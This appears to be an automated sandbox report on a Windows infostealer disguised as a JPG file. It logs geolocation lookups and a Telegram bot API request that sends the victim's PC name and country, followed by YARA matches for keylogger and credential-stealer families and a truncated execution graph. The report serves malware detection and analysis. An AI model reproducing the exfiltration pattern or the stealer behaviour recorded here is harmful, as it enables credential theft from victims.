                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f269ef122cb0-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1544533&cwnd=247&unsent_bytes=0&cid=4b67e64d2b2ddb23&ts=174&x=0"
                                                                                                        2024-11-18 12:26:05 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.649796188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:26:07 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-18 12:26:07 UTC854INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:07 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34250
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7opFUsSd8c%2FyV10sdgSr5NLZ3SbXl9QbV%2F8x%2BVeiyA9yh5SLKRBarSWNrTlP80mRkXhJfUJJRYXvYdxZlsHas5%2FNv1rpzE65GplGpSBHnQSch4FREc%2F3KA2XpkV1f6REVVn5EXRV"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f272ad6c2d47-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2547053&cwnd=250&unsent_bytes=0&cid=177a6fdc56d420f6&ts=154&x=0"
                                                                                                        2024-11-18 12:26:07 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.649809188.114.97.34436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:26:08 UTC87OUTGET /xml/155.94.241.187 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-18 12:26:08 UTC848INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 18 Nov 2024 12:26:08 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 358
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 34251
                                                                                                        Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                                                                        Accept-Ranges: bytes
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9YEppVJUTLSer80iUFfQNfbUX20rJPfkCdyTxOUH2ZHYfmfNXFffTHprSGD2fqWhqeXSiyqGHGygHNtY%2BlDFii7y7DWAmNeiw4QxsS0sx%2Fs2xOwsNAq3VyLc4EwIQtdkr5XW0OYN"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e47f27bcb596c16-DFW
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1127&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2569653&cwnd=250&unsent_bytes=0&cid=578361a21e93027a&ts=201&x=0"
                                                                                                        2024-11-18 12:26:08 UTC358INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                                                                        Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.649814149.154.167.2204436256C:\Windows\SysWOW64\svchost.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-18 12:26:09 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2018/11/2024%20/%2021:58:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                        Host: api.telegram.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-11-18 12:26:09 UTC344INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Mon, 18 Nov 2024 12:26:09 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 55
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-11-18 12:26:09 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:07:25:50
                                                                                                        Start date:18/11/2024
                                                                                                        Path:C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:882'009 bytes
                                                                                                        MD5 hash:B036012FF35A5F3738DCD36E5E9D55B1
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2200420683.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:07:25:51
                                                                                                        Start date:18/11/2024
                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exe"
                                                                                                        Imagebase:0xc0000
                                                                                                        File size:46'504 bytes
                                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4643358558.0000000007E10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4641266057.0000000006585000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.4637698281.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4638852120.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000003.2199994951.0000000003271000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4642986730.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4639663388.0000000005501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:4.4%
                                                                                                          Dynamic/Decrypted Code Coverage:1.5%
                                                                                                          Signature Coverage:9.6%
                                                                                                          Total number of Nodes:2000
                                                                                                          Total number of Limit Nodes:40
                                                                                                          execution_graph 75951 3c329a3 75952 3c329aa 75951->75952 75953 3c329b2 75952->75953 75954 3c32a48 75952->75954 75958 3c32658 75953->75958 75971 3c332f8 9 API calls 75954->75971 75957 3c32a2f 75972 3c30048 75958->75972 75961 3c32728 CreateFileW 75963 3c32735 75961->75963 75968 3c326f7 75961->75968 75962 3c32751 VirtualAlloc 75962->75963 75964 3c32772 ReadFile 75962->75964 75966 3c32952 75963->75966 75967 3c32944 VirtualFree 75963->75967 75964->75963 75965 3c32790 VirtualAlloc 75964->75965 75965->75963 75965->75968 75966->75957 75967->75966 75968->75962 75968->75963 75969 3c32858 CloseHandle 75968->75969 75970 3c32868 VirtualFree 75968->75970 75975 3c33568 GetPEB 75968->75975 75969->75968 75970->75968 75971->75957 75977 3c33508 GetPEB 75972->75977 75974 3c306d3 75974->75968 75976 3c33592 75975->75976 75976->75961 75978 3c33532 75977->75978 75978->75974 75979 4010e0 75982 401100 75979->75982 75981 4010f8 75983 401113 75982->75983 75984 401182 75983->75984 75985 401184 75983->75985 75986 40114c 75983->75986 75988 401120 75983->75988 75987 40112c DefWindowProcW 75984->75987 76020 401250 61 API calls __gmtime64_s 75985->76020 75989 401151 75986->75989 75990 40119d 75986->75990 75987->75981 75988->75987 76027 401000 Shell_NotifyIconW __gmtime64_s 75988->76027 75992 401219 75989->75992 75993 40115d 75989->75993 75995 4011a3 75990->75995 75996 42afb4 75990->75996 75992->75988 75999 401225 75992->75999 75997 401163 75993->75997 75998 42b01d 75993->75998 75994 401193 75994->75981 75995->75988 76002 4011b6 KillTimer 75995->76002 76003 4011db SetTimer RegisterWindowMessageW 75995->76003 76022 40f190 10 API calls 75996->76022 76004 42afe9 75997->76004 76005 40116c 75997->76005 75998->75987 76026 4370f4 52 API calls 75998->76026 76029 468b0e 74 API calls __gmtime64_s 75999->76029 76021 401000 Shell_NotifyIconW __gmtime64_s 76002->76021 76003->75994 76008 401204 CreatePopupMenu 76003->76008 76024 40f190 10 API calls 76004->76024 76005->75988 76010 401174 76005->76010 76006 42b04f 76028 40e0c0 74 API calls __gmtime64_s 76006->76028 76008->75981 76023 45fd57 65 API calls __gmtime64_s 76010->76023 76014 42b00e 76025 401a50 398 API calls 76014->76025 76015 4011c9 PostQuitMessage 76015->75981 76016 42afe4 76016->75994 76019 42afdc 76019->75987 76019->76016 76020->75994 76021->76015 76022->75994 76023->76019 76024->76014 76025->75984 76026->75984 76027->76006 76028->75984 76029->76016 76030 42d142 76034 480a8d 76030->76034 76032 42d14f 76033 480a8d 259 API calls 76032->76033 76033->76032 76035 480ae4 76034->76035 76036 480b26 76034->76036 76038 480aeb 76035->76038 76039 480b15 76035->76039 76065 40bc70 76036->76065 76040 480aee 76038->76040 76041 480b04 76038->76041 76076 4805bf 259 API calls 76039->76076 76040->76036 76043 480af3 76040->76043 76075 47fea2 259 API calls __itow_s 76041->76075 76074 47f135 259 API calls 76043->76074 76049 480aff 76103 408f40 76049->76103 76050 481156 76051 408f40 VariantClear 76050->76051 76052 48115e 76051->76052 76052->76032 76053 40e710 53 API calls 76063 480b2e 76053->76063 76056 40c2c0 52 API calls 76056->76063 76057 480ff5 76102 45e737 90 API calls 3 library calls 76057->76102 76058 408e80 VariantClear 76058->76063 76059 40a780 259 API calls 76059->76063 76063->76049 76063->76053 76063->76056 76063->76057 76063->76058 76063->76059 76070 40e0a0 76063->76070 76077 401980 76063->76077 76085 45377f 52 API calls 76063->76085 76086 45e951 53 API calls 76063->76086 76087 40e830 76063->76087 76100 47925f 53 API calls 76063->76100 76101 47fcff 259 API calls 76063->76101 76107 4115d7 76065->76107 76068 4115d7 52 API calls 76069 40bca6 76068->76069 76069->76063 76071 40e0b2 76070->76071 76072 40e0a8 76070->76072 76071->76063 76141 403c30 52 API calls _memmove 76072->76141 76074->76049 76075->76049 76076->76049 76078 4019a3 76077->76078 76079 401985 76077->76079 76078->76079 76080 4019b8 76078->76080 76082 40199f 76079->76082 76142 403e10 53 API calls 76079->76142 76143 403e10 53 API calls 76080->76143 76082->76063 76083 4019c4 76083->76063 76085->76063 76086->76063 76088 427c86 76087->76088 76089 40e84a 76087->76089 76145 40e1f0 VariantClear moneypunct 76088->76145 76144 40e950 53 API calls 76089->76144 76092 427c8b 76146 40e950 53 API calls 76092->76146 76093 40e84f 76093->76092 76094 40e85c 76093->76094 76095 4115d7 52 API calls 76094->76095 76099 40e907 76094->76099 76097 40e8fc 76095->76097 76098 4115d7 52 API calls 76097->76098 76098->76099 76099->76063 76100->76063 76101->76063 76102->76049 76104 408f48 moneypunct 76103->76104 76105 4265c7 VariantClear 76104->76105 76106 408f55 moneypunct 76104->76106 76105->76106 76106->76050 76109 4115e1 _malloc 76107->76109 76110 40bc98 76109->76110 76113 4115fd std::exception::exception 76109->76113 76118 4135bb 76109->76118 76110->76068 76111 41163b 76133 4180af 46 API calls std::exception::operator= 76111->76133 76113->76111 76132 41130a 51 API calls __cinit 76113->76132 76114 411645 76134 418105 RaiseException 76114->76134 76117 411656 76119 413638 _malloc 76118->76119 76130 4135c9 _malloc 76118->76130 76140 417f77 46 API calls __getptd_noexit 76119->76140 76120 4135d4 76120->76130 76135 418901 46 API calls __NMSG_WRITE 76120->76135 76136 418752 46 API calls 8 library calls 76120->76136 76137 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 76120->76137 76123 4135f7 RtlAllocateHeap 76125 413630 76123->76125 76123->76130 76125->76109 76126 413624 76138 417f77 46 API calls __getptd_noexit 76126->76138 76129 413622 76139 417f77 46 API calls __getptd_noexit 76129->76139 76130->76120 76130->76123 76130->76126 76130->76129 76132->76111 76133->76114 76134->76117 76135->76120 76136->76120 76138->76129 76139->76125 76140->76125 76141->76071 76142->76082 76143->76083 76144->76093 76145->76092 76146->76099 76147 40bd20 76149 428194 76147->76149 76150 40bd2d 76147->76150 76148 40bd43 76149->76148 76153 4281bc 76149->76153 76154 4281b2 76149->76154 76151 40bd37 76150->76151 76170 4531b1 85 API calls 5 library calls 76150->76170 76159 40bd50 76151->76159 76169 45e987 86 API calls moneypunct 76153->76169 76168 40b510 VariantClear 76154->76168 76158 4281ba 76160 426cf1 76159->76160 76161 40bd63 76159->76161 76180 44cde9 52 API calls _memmove 76160->76180 76171 40bd80 76161->76171 76164 40bd73 76164->76148 76165 426cfc 76166 40e0a0 52 API calls 76165->76166 76167 426d02 76166->76167 76168->76158 76169->76150 76170->76151 76172 40bd8e 76171->76172 76179 40bdb7 _memmove 76171->76179 76173 40bded 76172->76173 76174 40bdad 76172->76174 76172->76179 76175 4115d7 52 API calls 76173->76175 76181 402f00 76174->76181 76177 40bdf6 76175->76177 76178 4115d7 52 API calls 76177->76178 76177->76179 76178->76179 76179->76164 76180->76165 76182 402f10 76181->76182 76183 402f0c 76181->76183 76184 4268c3 76182->76184 76185 4115d7 52 API calls 76182->76185 76183->76179 76186 402f51 moneypunct _memmove 76185->76186 76186->76179 76187 425ba2 76192 40e360 76187->76192 76189 425bb4 76208 41130a 51 API calls __cinit 76189->76208 76191 425bbe 76193 4115d7 52 API calls 76192->76193 76194 40e3ec GetModuleFileNameW 76193->76194 76209 413a0e 76194->76209 76196 40e421 _wcsncat 76212 413a9e 76196->76212 76199 4115d7 52 API calls 76200 40e45e _wcscpy 76199->76200 76201 40bc70 52 API calls 76200->76201 76202 40e498 76201->76202 76215 40e4c0 76202->76215 76204 40e4a1 _wcscat _wcslen _wcsncpy 76205 40e4a9 76204->76205 76206 401c90 52 API calls 76204->76206 76207 4115d7 52 API calls 76204->76207 76205->76189 76206->76204 76207->76204 76208->76191 76229 413801 76209->76229 76259 419efd 76212->76259 76271 403350 76215->76271 76217 40e4cb RegOpenKeyExW 76218 427190 RegQueryValueExW 76217->76218 76219 40e4eb 76217->76219 76220 4271b0 76218->76220 76221 42721a RegCloseKey 76218->76221 76219->76204 76222 4115d7 52 API calls 76220->76222 76221->76204 76223 4271cb 76222->76223 76278 43652f 52 API calls 76223->76278 76225 4271d8 RegQueryValueExW 76226 42720e 76225->76226 76227 4271f7 76225->76227 76226->76221 76279 402160 76227->76279 76231 41389e 76229->76231 76237 41381a 76229->76237 76230 4139e8 76256 417f77 46 API calls __getptd_noexit 76230->76256 76231->76230 76233 413a00 76231->76233 76258 417f77 46 API calls __getptd_noexit 76233->76258 76234 4139ed 76257 417f25 10 API calls __mbsnbicoll_l 76234->76257 76237->76231 76243 41388a 76237->76243 76251 419e30 46 API calls __mbsnbicoll_l 76237->76251 76239 41396c 76239->76231 76240 413967 76239->76240 76244 41397a 76239->76244 76240->76196 76241 413929 76241->76231 76242 413945 76241->76242 76253 419e30 46 API calls __mbsnbicoll_l 76241->76253 76242->76231 76242->76240 76247 41395b 76242->76247 76243->76231 76250 413909 76243->76250 76252 419e30 46 API calls __mbsnbicoll_l 76243->76252 76255 419e30 46 API calls __mbsnbicoll_l 76244->76255 76254 419e30 46 API calls __mbsnbicoll_l 76247->76254 76250->76239 76250->76241 76251->76243 76252->76250 76253->76242 76254->76240 76255->76240 76256->76234 76257->76240 76258->76240 76260 419f13 76259->76260 76261 419f0e 76259->76261 76268 417f77 46 API calls __getptd_noexit 76260->76268 76261->76260 76267 419f2b 76261->76267 76263 419f18 76269 417f25 10 API calls __mbsnbicoll_l 76263->76269 76266 40e454 76266->76199 76267->76266 76270 417f77 46 API calls __getptd_noexit 76267->76270 76268->76263 76269->76266 76270->76263 76272 403367 76271->76272 76273 403358 76271->76273 76274 4115d7 52 API calls 76272->76274 76273->76217 76275 403370 76274->76275 76276 4115d7 52 API calls 76275->76276 76277 40339e 76276->76277 76277->76217 76278->76225 76280 426daa 76279->76280 76282 40216b _wcslen 76279->76282 76294 40c600 76280->76294 76284 402180 76282->76284 76285 40219e 76282->76285 76283 426db5 76283->76226 76292 403bd0 52 API calls moneypunct 76284->76292 76293 4013a0 52 API calls 76285->76293 76288 402187 _memmove 76288->76226 76289 4021a5 76290 426db7 76289->76290 76291 4115d7 52 API calls 76289->76291 76291->76288 76292->76288 76293->76289 76295 40c619 76294->76295 76296 40c60a 76294->76296 76295->76283 76296->76295 76299 4026f0 52 API calls _memmove 76296->76299 76298 426d7a _memmove 76298->76283 76299->76298 76300 416454 76337 416c70 76300->76337 76302 416460 GetStartupInfoW 76304 416474 76302->76304 76338 419d5a HeapCreate 76304->76338 76305 4164cd 76306 4164d8 76305->76306 76421 41642b 46 API calls 3 library calls 76305->76421 76339 417c20 GetModuleHandleW 76306->76339 76309 4164de 76310 4164e9 __RTC_Initialize 76309->76310 76422 41642b 46 API calls 3 library calls 76309->76422 76358 41aaa1 GetStartupInfoW 76310->76358 76314 416503 GetCommandLineW 76371 41f584 GetEnvironmentStringsW 76314->76371 76318 416513 76377 41f4d6 GetModuleFileNameW 76318->76377 76320 41651d 76321 416528 76320->76321 76424 411924 46 API calls 3 library calls 76320->76424 76381 41f2a4 76321->76381 76324 41652e 76325 416539 76324->76325 76425 411924 46 API calls 3 library calls 76324->76425 76395 411703 76325->76395 76328 416541 76330 41654c __wwincmdln 76328->76330 76426 411924 46 API calls 3 library calls 76328->76426 76399 40d6b0 76330->76399 76333 41657c 76428 411906 46 API calls _doexit 76333->76428 76336 416581 __tzset_nolock 76337->76302 76338->76305 76340 417c34 76339->76340 76341 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 76339->76341 76429 4178ff 49 API calls _free 76340->76429 76343 417c87 TlsAlloc 76341->76343 76346 417cd5 TlsSetValue 76343->76346 76347 417d96 76343->76347 76344 417c39 76344->76309 76346->76347 76348 417ce6 __init_pointers 76346->76348 76347->76309 76430 418151 InitializeCriticalSectionAndSpinCount 76348->76430 76350 417d91 76438 4178ff 49 API calls _free 76350->76438 76352 417d2a 76352->76350 76431 416b49 76352->76431 76355 417d76 76437 41793c 46 API calls 4 library calls 76355->76437 76357 417d7e GetCurrentThreadId 76357->76347 76359 416b49 __calloc_crt 46 API calls 76358->76359 76369 41aabf 76359->76369 76360 41ac6a GetStdHandle 76366 41ac34 76360->76366 76361 